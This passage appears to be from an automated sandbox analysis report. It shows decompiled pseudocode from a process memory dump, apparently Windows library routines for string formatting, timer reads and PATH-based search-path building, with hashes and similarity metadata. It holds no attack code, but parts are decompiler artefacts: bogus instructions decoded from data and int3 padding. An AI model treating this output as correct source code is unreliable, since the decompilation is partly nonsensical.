                                                    										if( *((char*)(_t114 + 0x14)) == 1) {
                                                    											__eflags = _t101 - 0x80000003;
                                                    											if(_t101 == 0x80000003) {
                                                    												E04B8B7E0(1);
                                                    												_t101 = 0;
                                                    												__eflags = 0;
                                                    											}
                                                    										}
                                                    										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                    										goto L4;
                                                    									}
                                                    									__eflags = _t109 - 0x80000005;
                                                    									if(_t109 == 0x80000005) {
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    								 *(_t114 - 0x90) = 0;
                                                    								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                    								_t91 = E04B8E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                    								_t115 = _t115 + 0x10;
                                                    								_t104 = _t91;
                                                    								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                    								__eflags = _t104;
                                                    								if(_t104 < 0) {
                                                    									L21:
                                                    									_t109 = 0x80000005;
                                                    									 *(_t114 - 0x90) = 0x80000005;
                                                    									L22:
                                                    									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                    									L23:
                                                    									 *(_t114 - 0x94) = _t109;
                                                    									goto L26;
                                                    								}
                                                    								__eflags = _t104 - _t92;
                                                    								if(__eflags > 0) {
                                                    									goto L21;
                                                    								}
                                                    								if(__eflags == 0) {
                                                    									goto L22;
                                                    								}
                                                    								goto L23;
                                                    							}
                                                    							goto L15;
                                                    						}
                                                    					}
                                                    					__eflags = _t109;
                                                    					if(_t109 >= 0) {
                                                    						goto L31;
                                                    					}
                                                    					__eflags = _t109 - 0x80000005;
                                                    					if(_t109 != 0x80000005) {
                                                    						goto L31;
                                                    					}
                                                    					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                    					_t38 = _t95 - 1; // -129
                                                    					_t99 = _t38;
                                                    					goto L34;
                                                    				}
                                                    				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                    					__eflags = __edx - 0x65;
                                                    					if(__edx != 0x65) {
                                                    						goto L2;
                                                    					}
                                                    					goto L6;
                                                    				}
                                                    				L2:
                                                    				_push( *((intOrPtr*)(_t114 + 8)));
                                                    				_push(_t106);
                                                    				if(E04B8A890() != 0) {
                                                    					goto L6;
                                                    				}
                                                    				goto L3;
                                                    			}























                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 00d859b5eaf9fd077a63e22b991cc6c5d53f95603b781a74ab1682f752f07a1c
                                                    • Instruction ID: 89868561e0879613c3090b59ada00b1974b9a72899fb89e72088746dee27744d
                                                    • Opcode Fuzzy Hash: 00d859b5eaf9fd077a63e22b991cc6c5d53f95603b781a74ab1682f752f07a1c
                                                    • Instruction Fuzzy Hash: CA51E171D082598EEF30CF74C845BAEBBB0EF40714F2041EDD859AB281D7B4A965DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E04B6B944(signed int* __ecx, char __edx) {
                                                    				signed int _v8;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				char _v28;
                                                    				signed int _v32;
                                                    				char _v36;
                                                    				signed int _v40;
                                                    				intOrPtr _v44;
                                                    				signed int* _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				intOrPtr _v60;
                                                    				intOrPtr _v64;
                                                    				intOrPtr _v68;
                                                    				intOrPtr _v72;
                                                    				intOrPtr _v76;
                                                    				char _v77;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr* _t65;
                                                    				intOrPtr _t67;
                                                    				intOrPtr _t68;
                                                    				char* _t73;
                                                    				intOrPtr _t77;
                                                    				intOrPtr _t78;
                                                    				signed int _t82;
                                                    				intOrPtr _t83;
                                                    				void* _t87;
                                                    				char _t88;
                                                    				intOrPtr* _t89;
                                                    				intOrPtr _t91;
                                                    				void* _t97;
                                                    				intOrPtr _t100;
                                                    				void* _t102;
                                                    				void* _t107;
                                                    				signed int _t108;
                                                    				intOrPtr* _t112;
                                                    				void* _t113;
                                                    				intOrPtr* _t114;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t116;
                                                    				intOrPtr _t117;
                                                    				signed int _t118;
                                                    				void* _t130;
                                                    
                                                    				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                    				_v8 =  *0x4c3d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                    				_t112 = __ecx;
                                                    				_v77 = __edx;
                                                    				_v48 = __ecx;
                                                    				_v28 = 0;
                                                    				_t5 = _t112 + 0xc; // 0x575651ff
                                                    				_t105 =  *_t5;
                                                    				_v20 = 0;
                                                    				_v16 = 0;
                                                    				if(_t105 == 0) {
                                                    					_t50 = _t112 + 4; // 0x5de58b5b
                                                    					_t60 =  *__ecx |  *_t50;
                                                    					if(( *__ecx |  *_t50) != 0) {
                                                    						 *__ecx = 0;
                                                    						__ecx[1] = 0;
                                                    						if(E04B67D50() != 0) {
                                                    							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    						} else {
                                                    							_t65 = 0x7ffe0386;
                                                    						}
                                                    						if( *_t65 != 0) {
                                                    							E04C18CD6(_t112);
                                                    						}
                                                    						_push(0);
                                                    						_t52 = _t112 + 0x10; // 0x778df98b
                                                    						_push( *_t52);
                                                    						_t60 = E04B89E20();
                                                    					}
                                                    					L20:
                                                    					_pop(_t107);
                                                    					_pop(_t113);
                                                    					_pop(_t87);
                                                    					return E04B8B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                    				}
                                                    				_t8 = _t112 + 8; // 0x8b000cc2
                                                    				_t67 =  *_t8;
                                                    				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                    				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                    				_t108 =  *(_t67 + 0x14);
                                                    				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                    				_t105 = 0x2710;
                                                    				asm("sbb eax, edi");
                                                    				_v44 = _t88;
                                                    				_v52 = _t108;
                                                    				_t60 = E04B8CE00(_t97, _t68, 0x2710, 0);
                                                    				_v56 = _t60;
                                                    				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                    					L3:
                                                    					 *(_t112 + 0x44) = _t60;
                                                    					_t105 = _t60 * 0x2710 >> 0x20;
                                                    					 *_t112 = _t88;
                                                    					 *(_t112 + 4) = _t108;
                                                    					_v20 = _t60 * 0x2710;
                                                    					_v16 = _t60 * 0x2710 >> 0x20;
                                                    					if(_v77 != 0) {
                                                    						L16:
                                                    						_v36 = _t88;
                                                    						_v32 = _t108;
                                                    						if(E04B67D50() != 0) {
                                                    							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    						} else {
                                                    							_t73 = 0x7ffe0386;
                                                    						}
                                                    						if( *_t73 != 0) {
                                                    							_t105 = _v40;
                                                    							E04C18F6A(_t112, _v40, _t88, _t108);
                                                    						}
                                                    						_push( &_v28);
                                                    						_push(0);
                                                    						_push( &_v36);
                                                    						_t48 = _t112 + 0x10; // 0x778df98b
                                                    						_push( *_t48);
                                                    						_t60 = E04B8AF60();
                                                    						goto L20;
                                                    					} else {
                                                    						_t89 = 0x7ffe03b0;
                                                    						do {
                                                    							_t114 = 0x7ffe0010;
                                                    							do {
                                                    								_t77 =  *0x4c38628; // 0x0
                                                    								_v68 = _t77;
                                                    								_t78 =  *0x4c3862c; // 0x0
                                                    								_v64 = _t78;
                                                    								_v72 =  *_t89;
                                                    								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                    								while(1) {
                                                    									_t105 =  *0x7ffe000c;
                                                    									_t100 =  *0x7ffe0008;
                                                    									if(_t105 ==  *_t114) {
                                                    										goto L8;
                                                    									}
                                                    									asm("pause");
                                                    								}
                                                    								L8:
                                                    								_t89 = 0x7ffe03b0;
                                                    								_t115 =  *0x7ffe03b0;
                                                    								_t82 =  *0x7FFE03B4;
                                                    								_v60 = _t115;
                                                    								_t114 = 0x7ffe0010;
                                                    								_v56 = _t82;
                                                    							} while (_v72 != _t115 || _v76 != _t82);
                                                    							_t83 =  *0x4c38628; // 0x0
                                                    							_t116 =  *0x4c3862c; // 0x0
                                                    							_v76 = _t116;
                                                    							_t117 = _v68;
                                                    						} while (_t117 != _t83 || _v64 != _v76);
                                                    						asm("sbb edx, [esp+0x24]");
                                                    						_t102 = _t100 - _v60 - _t117;
                                                    						_t112 = _v48;
                                                    						_t91 = _v44;
                                                    						asm("sbb edx, eax");
                                                    						_t130 = _t105 - _v52;
                                                    						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                    							_t88 = _t102 - _t91;
                                                    							asm("sbb edx, edi");
                                                    							_t108 = _t105;
                                                    						} else {
                                                    							_t88 = 0;
                                                    							_t108 = 0;
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    				} else {
                                                    					if( *(_t112 + 0x44) == _t60) {
                                                    						goto L20;
                                                    					}
                                                    					goto L3;
                                                    				}
                                                    			}
                                                    0x04b6ba7c
                                                    0x04b6bb0a
                                                    0x04b6bb0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6bb0f

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B6B9A5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: 0617b3989d06b9f3d40f001b0d71635338ad547d137f5ec8e69d67039e392443
                                                    • Instruction ID: 99fc51b04c11102caca0b0d922bed8296cfcab51001c9672dee4dd1ce435c2e4
                                                    • Opcode Fuzzy Hash: 0617b3989d06b9f3d40f001b0d71635338ad547d137f5ec8e69d67039e392443
                                                    • Instruction Fuzzy Hash: 4D513571A08350CFC720DF29C080A2ABBF9FB88614F1449AEE596C7355EB75F845CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E04B72581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                    				signed int _v8;
                                                    				signed int _v16;
                                                    				unsigned int _v24;
                                                    				void* _v28;
                                                    				signed int _v32;
                                                    				unsigned int _v36;
                                                    				signed int _v37;
                                                    				signed int _v40;
                                                    				signed int _v44;
                                                    				signed int _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				intOrPtr _v60;
                                                    				signed int _v64;
                                                    				signed int _v68;
                                                    				signed int _v72;
                                                    				signed int _v76;
                                                    				signed int _v80;
                                                    				signed int _t233;
                                                    				signed int _t237;
                                                    				signed int _t248;
                                                    				signed int _t250;
                                                    				intOrPtr _t252;
                                                    				signed int _t255;
                                                    				signed int _t262;
                                                    				signed int _t265;
                                                    				signed int _t273;
                                                    				intOrPtr _t279;
                                                    				signed int _t281;
                                                    				signed int _t283;
                                                    				signed int _t291;
                                                    				unsigned int _t294;
                                                    				signed int _t298;
                                                    				signed int _t300;
                                                    				signed int _t304;
                                                    				intOrPtr _t316;
                                                    				signed int _t325;
                                                    				signed int _t327;
                                                    				signed int _t328;
                                                    				signed int _t332;
                                                    				signed int _t333;
                                                    				void* _t335;
                                                    				signed int _t336;
                                                    				signed int _t338;
                                                    				signed int _t340;
                                                    				void* _t341;
                                                    
                                                    				_t338 = _t340;
                                                    				_t341 = _t340 - 0x4c;
                                                    				_v8 =  *0x4c3d360 ^ _t338;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_t332 = 0x4c3b2e8;
                                                    				_v56 = _a4;
                                                    				_v48 = __edx;
                                                    				_v60 = __ecx;
                                                    				_t294 = 0;
                                                    				_v80 = 0;
                                                    				asm("movsd");
                                                    				_v64 = 0;
                                                    				_v76 = 0;
                                                    				_v72 = 0;
                                                    				asm("movsd");
                                                    				_v44 = 0;
                                                    				_v52 = 0;
                                                    				_v68 = 0;
                                                    				asm("movsd");
                                                    				_v32 = 0;
                                                    				_v36 = 0;
                                                    				asm("movsd");
                                                    				_v16 = 0;
                                                    				_t279 = 0x48;
                                                    				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                    				_t325 = 0;
                                                    				_v37 = _t314;
                                                    				if(_v48 <= 0) {
                                                    					L16:
                                                    					_t45 = _t279 - 0x48; // 0x0
                                                    					__eflags = _t45 - 0xfffe;
                                                    					if(_t45 > 0xfffe) {
                                                    						_t333 = 0xc0000106;
                                                    						goto L32;
                                                    					} else {
                                                    						_t332 = L04B64620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
                                                    						_v52 = _t332;
                                                    						__eflags = _t332;
                                                    						if(_t332 == 0) {
                                                    							_t333 = 0xc0000017;
                                                    							goto L32;
                                                    						} else {
                                                    							 *(_t332 + 0x44) =  *(_t332 + 0x44) & 0x00000000;
                                                    							_t50 = _t332 + 0x48; // 0x48
                                                    							_t327 = _t50;
                                                    							_t314 = _v32;
                                                    							 *((intOrPtr*)(_t332 + 0x3c)) = _t279;
                                                    							_t281 = 0;
                                                    							 *((short*)(_t332 + 0x30)) = _v48;
                                                    							__eflags = _t314;
                                                    							if(_t314 != 0) {
                                                    								 *(_t332 + 0x18) = _t327;
                                                    								__eflags = _t314 - 0x4c38478;
                                                    								 *_t332 = ((0 | _t314 == 0x04c38478) - 0x00000001 & 0xfffffffb) + 7;
                                                    								E04B8F3E0(_t327,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
                                                    								_t314 = _v32;
                                                    								_t341 = _t341 + 0xc;
                                                    								_t281 = 1;
                                                    								__eflags = _a8;
                                                    								_t327 = _t327 + (( *_t314 & 0x0000ffff) >> 1) * 2;
                                                    								if(_a8 != 0) {
                                                    									_t273 = E04BD39F2(_t327);
                                                    									_t314 = _v32;
                                                    									_t327 = _t273;
                                                    								}
                                                    							}
                                                    							_t298 = 0;
                                                    							_v16 = 0;
                                                    							__eflags = _v48;
                                                    							if(_v48 <= 0) {
                                                    								L31:
                                                    								_t333 = _v68;
                                                    								__eflags = 0;
                                                    								 *((short*)(_t327 - 2)) = 0;
                                                    								goto L32;
                                                    							} else {
                                                    								_t283 = _t332 + _t281 * 4;
                                                    								_v56 = _t283;
                                                    								do {
                                                    									__eflags = _t314;
                                                    									if(_t314 != 0) {
                                                    										_t233 =  *(_v60 + _t298 * 4);
                                                    										__eflags = _t233;
                                                    										if(_t233 == 0) {
                                                    											goto L30;
                                                    										} else {
                                                    											__eflags = _t233 == 5;
                                                    											if(_t233 == 5) {
                                                    												goto L30;
                                                    											} else {
                                                    												goto L22;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										L22:
                                                    										 *_t283 =  *(_v60 + _t298 * 4);
                                                    										 *(_t283 + 0x18) = _t327;
                                                    										_t237 =  *(_v60 + _t298 * 4);
                                                    										__eflags = _t237 - 8;
                                                    										if(_t237 > 8) {
                                                    											goto L56;
                                                    										} else {
                                                    											switch( *((intOrPtr*)(_t237 * 4 +  &M04B72959))) {
                                                    												case 0:
                                                    													__ax =  *0x4c38488;
                                                    													__eflags = __ax;
                                                    													if(__ax == 0) {
                                                    														goto L29;
                                                    													} else {
                                                    														__ax & 0x0000ffff = E04B8F3E0(__edi,  *0x4c3848c, __ax & 0x0000ffff);
                                                    														__eax =  *0x4c38488 & 0x0000ffff;
                                                    														goto L26;
                                                    													}
                                                    													goto L108;
                                                    												case 1:
                                                    													L45:
                                                    													E04B8F3E0(_t327, _v80, _v64);
                                                    													_t268 = _v64;
                                                    													goto L26;
                                                    												case 2:
                                                    													 *0x4c38480 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c38484,  *0x4c38480 & 0x0000ffff);
                                                    													__eax =  *0x4c38480 & 0x0000ffff;
                                                    													__eax = ( *0x4c38480 & 0x0000ffff) >> 1;
                                                    													__edi = __edi + __eax * 2;
                                                    													goto L28;
                                                    												case 3:
                                                    													__eax = _v44;
                                                    													__eflags = __eax;
                                                    													if(__eax == 0) {
                                                    														goto L29;
                                                    													} else {
                                                    														__esi = __eax + __eax;
                                                    														__eax = E04B8F3E0(__edi, _v72, __esi);
                                                    														__edi = __edi + __esi;
                                                    														__esi = _v52;
                                                    														goto L27;
                                                    													}
                                                    													goto L108;
                                                    												case 4:
                                                    													_push(0x2e);
                                                    													_pop(__eax);
                                                    													 *(__esi + 0x44) = __edi;
                                                    													 *__edi = __ax;
                                                    													__edi = __edi + 4;
                                                    													_push(0x3b);
                                                    													_pop(__eax);
                                                    													 *(__edi - 2) = __ax;
                                                    													goto L29;
                                                    												case 5:
                                                    													__eflags = _v36;
                                                    													if(_v36 == 0) {
                                                    														goto L45;
                                                    													} else {
                                                    														E04B8F3E0(_t327, _v76, _v36);
                                                    														_t268 = _v36;
                                                    													}
                                                    													L26:
                                                    													_t341 = _t341 + 0xc;
                                                    													_t327 = _t327 + (_t268 >> 1) * 2 + 2;
                                                    													__eflags = _t327;
                                                    													L27:
                                                    													_push(0x3b);
                                                    													_pop(_t270);
                                                    													 *((short*)(_t327 - 2)) = _t270;
                                                    													goto L28;
                                                    												case 6:
                                                    													__ebx =  *0x4c3575c;
                                                    													__eflags = __ebx - 0x4c3575c;
                                                    													if(__ebx != 0x4c3575c) {
                                                    														_push(0x3b);
                                                    														_pop(__esi);
                                                    														do {
                                                    															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                    															E04B8F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                    															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                    															__edi = __edi + __eax * 2;
                                                    															__edi = __edi + 2;
                                                    															 *(__edi - 2) = __si;
                                                    															__ebx =  *__ebx;
                                                    															__eflags = __ebx - 0x4c3575c;
                                                    														} while (__ebx != 0x4c3575c);
                                                    														__esi = _v52;
                                                    														__ecx = _v16;
                                                    														__edx = _v32;
                                                    													}
                                                    													__ebx = _v56;
                                                    													goto L29;
                                                    												case 7:
                                                    													 *0x4c38478 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c3847c,  *0x4c38478 & 0x0000ffff);
                                                    													__eax =  *0x4c38478 & 0x0000ffff;
                                                    													__eax = ( *0x4c38478 & 0x0000ffff) >> 1;
                                                    													__eflags = _a8;
                                                    													__edi = __edi + __eax * 2;
                                                    													if(_a8 != 0) {
                                                    														__ecx = __edi;
                                                    														__eax = E04BD39F2(__ecx);
                                                    														__edi = __eax;
                                                    													}
                                                    													goto L28;
                                                    												case 8:
                                                    													__eax = 0;
                                                    													 *(__edi - 2) = __ax;
                                                    													 *0x4c36e58 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c36e5c,  *0x4c36e58 & 0x0000ffff);
                                                    													 *(__esi + 0x38) = __edi;
                                                    													__eax =  *0x4c36e58 & 0x0000ffff;
                                                    													__eax = ( *0x4c36e58 & 0x0000ffff) >> 1;
                                                    													__edi = __edi + __eax * 2;
                                                    													__edi = __edi + 2;
                                                    													L28:
                                                    													_t298 = _v16;
                                                    													_t314 = _v32;
                                                    													L29:
                                                    													_t283 = _t283 + 4;
                                                    													__eflags = _t283;
                                                    													_v56 = _t283;
                                                    													goto L30;
                                                    											}
                                                    										}
                                                    									}
                                                    									goto L108;
                                                    									L30:
                                                    									_t298 = _t298 + 1;
                                                    									_v16 = _t298;
                                                    									__eflags = _t298 - _v48;
                                                    								} while (_t298 < _v48);
                                                    								goto L31;
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					while(1) {
                                                    						L1:
                                                    						_t237 =  *(_v60 + _t325 * 4);
                                                    						if(_t237 > 8) {
                                                    							break;
                                                    						}
                                                    						switch( *((intOrPtr*)(_t237 * 4 +  &M04B72935))) {
                                                    							case 0:
                                                    								__ax =  *0x4c38488;
                                                    								__eflags = __ax;
                                                    								if(__ax != 0) {
                                                    									__eax = __ax & 0x0000ffff;
                                                    									__ebx = __ebx + 2;
                                                    									__eflags = __ebx;
                                                    									goto L53;
                                                    								}
                                                    								goto L14;
                                                    							case 1:
                                                    								L44:
                                                    								_t314 =  &_v64;
                                                    								_v80 = E04B72E3E(0,  &_v64);
                                                    								_t279 = _t279 + _v64 + 2;
                                                    								goto L13;
                                                    							case 2:
                                                    								__eax =  *0x4c38480 & 0x0000ffff;
                                                    								__ebx = __ebx + __eax;
                                                    								__eflags = __dl;
                                                    								if(__dl != 0) {
                                                    									__eax = 0x4c38480;
                                                    									goto L80;
                                                    								}
                                                    								goto L14;
                                                    							case 3:
                                                    								__eax = E04B5EEF0(0x4c379a0);
                                                    								__eax =  &_v44;
                                                    								_push(__eax);
                                                    								_push(0);
                                                    								_push(0);
                                                    								_push(4);
                                                    								_push(L"PATH");
                                                    								_push(0);
                                                    								L57();
                                                    								__esi = __eax;
                                                    								_v68 = __esi;
                                                    								__eflags = __esi - 0xc0000023;
                                                    								if(__esi != 0xc0000023) {
                                                    									L10:
                                                    									__eax = E04B5EB70(__ecx, 0x4c379a0);
                                                    									__eflags = __esi - 0xc0000100;
                                                    									if(__esi == 0xc0000100) {
                                                    										_v44 = _v44 & 0x00000000;
                                                    										__eax = 0;
                                                    										_v68 = 0;
                                                    										goto L13;
                                                    									} else {
                                                    										__eflags = __esi;
                                                    										if(__esi < 0) {
                                                    											L32:
                                                    											_t211 = _v72;
                                                    											__eflags = _t211;
                                                    											if(_t211 != 0) {
                                                    												L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                                    											}
                                                    											_t212 = _v52;
                                                    											__eflags = _t212;
                                                    											if(_t212 != 0) {
                                                    												__eflags = _t333;
                                                    												if(_t333 < 0) {
                                                    													L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                                    													_t212 = 0;
                                                    												}
                                                    											}
                                                    											goto L36;
                                                    										} else {
                                                    											__eax = _v44;
                                                    											__ebx = __ebx + __eax * 2;
                                                    											__ebx = __ebx + 2;
                                                    											__eflags = __ebx;
                                                    											L13:
                                                    											_t294 = _v36;
                                                    											goto L14;
                                                    										}
                                                    									}
                                                    								} else {
                                                    									__eax = _v44;
                                                    									__ecx =  *0x4c37b9c; // 0x0
                                                    									_v44 + _v44 =  *[fs:0x30];
                                                    									__ecx = __ecx + 0x180000;
                                                    									__eax = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                    									_v72 = __eax;
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										__eax = E04B5EB70(__ecx, 0x4c379a0);
                                                    										__eax = _v52;
                                                    										L36:
                                                    										_pop(_t326);
                                                    										_pop(_t334);
                                                    										__eflags = _v8 ^ _t338;
                                                    										_pop(_t280);
                                                    										return E04B8B640(_t212, _t280, _v8 ^ _t338, _t314, _t326, _t334);
                                                    									} else {
                                                    										__ecx =  &_v44;
                                                    										_push(__ecx);
                                                    										_push(_v44);
                                                    										_push(__eax);
                                                    										_push(4);
                                                    										_push(L"PATH");
                                                    										_push(0);
                                                    										L57();
                                                    										__esi = __eax;
                                                    										_v68 = __eax;
                                                    										goto L10;
                                                    									}
                                                    								}
                                                    								goto L108;
                                                    							case 4:
                                                    								__ebx = __ebx + 4;
                                                    								goto L14;
                                                    							case 5:
                                                    								_t275 = _v56;
                                                    								if(_v56 != 0) {
                                                    									_t314 =  &_v36;
                                                    									_t277 = E04B72E3E(_t275,  &_v36);
                                                    									_t294 = _v36;
                                                    									_v76 = _t277;
                                                    								}
                                                    								if(_t294 == 0) {
                                                    									goto L44;
                                                    								} else {
                                                    									_t279 = _t279 + 2 + _t294;
                                                    								}
                                                    								goto L14;
                                                    							case 6:
                                                    								__eax =  *0x4c35764 & 0x0000ffff;
                                                    								goto L53;
                                                    							case 7:
                                                    								__eax =  *0x4c38478 & 0x0000ffff;
                                                    								__ebx = __ebx + __eax;
                                                    								__eflags = _a8;
                                                    								if(_a8 != 0) {
                                                    									__ebx = __ebx + 0x16;
                                                    									__ebx = __ebx + __eax;
                                                    								}
                                                    								__eflags = __dl;
                                                    								if(__dl != 0) {
                                                    									__eax = 0x4c38478;
                                                    									L80:
                                                    									_v32 = __eax;
                                                    								}
                                                    								goto L14;
                                                    							case 8:
                                                    								__eax =  *0x4c36e58 & 0x0000ffff;
                                                    								__eax = ( *0x4c36e58 & 0x0000ffff) + 2;
                                                    								L53:
                                                    								__ebx = __ebx + __eax;
                                                    								L14:
                                                    								_t325 = _t325 + 1;
                                                    								if(_t325 >= _v48) {
                                                    									goto L16;
                                                    								} else {
                                                    									_t314 = _v37;
                                                    									goto L1;
                                                    								}
                                                    								goto L108;
                                                    						}
                                                    					}
                                                    					L56:
                                                    					_push(0x25);
                                                    					asm("int 0x29");
                                                    					asm("out 0x28, al");
                                                    					asm("o16 sub [edi-0x48d81ffc], dh");
                                                    					_t335 = _t332 + 1;
                                                    					 *((intOrPtr*)(_t327 - 0x48d9fafc)) =  *((intOrPtr*)(_t327 - 0x48d9fafc)) - _t314;
                                                    					 *((intOrPtr*)(_t327 - 0x48d809fc)) =  *((intOrPtr*)(_t327 - 0x48d809fc)) - _t314;
                                                    					 *((intOrPtr*)(_t327 - 0x48d7b1fc)) =  *((intOrPtr*)(_t327 - 0x48d7b1fc)) - _t314;
                                                    					asm("daa");
                                                    					asm("fcomp dword [ebx-0x45]");
                                                    					 *((intOrPtr*)(_t327 - 0x44a3cbfc)) =  *((intOrPtr*)(_t327 - 0x44a3cbfc)) - _t314;
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					asm("int3");
                                                    					_push(0x20);
                                                    					_push(0x4c1ff00);
                                                    					E04B9D08C(4, _t327, _t335);
                                                    					_v44 =  *[fs:0x18];
                                                    					_t328 = 0;
                                                    					 *_a24 = 0;
                                                    					_t291 = _a12;
                                                    					__eflags = _t291;
                                                    					if(_t291 == 0) {
                                                    						_t248 = 0xc0000100;
                                                    					} else {
                                                    						_v8 = 0;
                                                    						_t336 = 0xc0000100;
                                                    						_v52 = 0xc0000100;
                                                    						_t250 = 4;
                                                    						while(1) {
                                                    							_v40 = _t250;
                                                    							__eflags = _t250;
                                                    							if(_t250 == 0) {
                                                    								break;
                                                    							}
                                                    							_t304 = _t250 * 0xc;
                                                    							_v48 = _t304;
                                                    							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0x4b21664));
                                                    							if(__eflags <= 0) {
                                                    								if(__eflags == 0) {
                                                    									_t265 = E04B8E5C0(_a8,  *((intOrPtr*)(_t304 + 0x4b21668)), _t291);
                                                    									_t341 = _t341 + 0xc;
                                                    									__eflags = _t265;
                                                    									if(__eflags == 0) {
                                                    										_t336 = E04BC51BE(_t291,  *((intOrPtr*)(_v48 + 0x4b2166c)), _a16, _t328, _t336, __eflags, _a20, _a24);
                                                    										_v52 = _t336;
                                                    										break;
                                                    									} else {
                                                    										_t250 = _v40;
                                                    										goto L62;
                                                    									}
                                                    									goto L70;
                                                    								} else {
                                                    									L62:
                                                    									_t250 = _t250 - 1;
                                                    									continue;
                                                    								}
                                                    							}
                                                    							break;
                                                    						}
                                                    						_v32 = _t336;
                                                    						__eflags = _t336;
                                                    						if(_t336 < 0) {
                                                    							__eflags = _t336 - 0xc0000100;
                                                    							if(_t336 == 0xc0000100) {
                                                    								_t300 = _a4;
                                                    								__eflags = _t300;
                                                    								if(_t300 != 0) {
                                                    									_v36 = _t300;
                                                    									__eflags =  *_t300 - _t328;
                                                    									if( *_t300 == _t328) {
                                                    										_t336 = 0xc0000100;
                                                    										goto L76;
                                                    									} else {
                                                    										_t316 =  *((intOrPtr*)(_v44 + 0x30));
                                                    										_t252 =  *((intOrPtr*)(_t316 + 0x10));
                                                    										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t300;
                                                    										if( *((intOrPtr*)(_t252 + 0x48)) == _t300) {
                                                    											__eflags =  *(_t316 + 0x1c);
                                                    											if( *(_t316 + 0x1c) == 0) {
                                                    												L106:
                                                    												_t336 = E04B72AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
                                                    												_v32 = _t336;
                                                    												__eflags = _t336 - 0xc0000100;
                                                    												if(_t336 != 0xc0000100) {
                                                    													goto L69;
                                                    												} else {
                                                    													_t328 = 1;
                                                    													_t300 = _v36;
                                                    													goto L75;
                                                    												}
                                                    											} else {
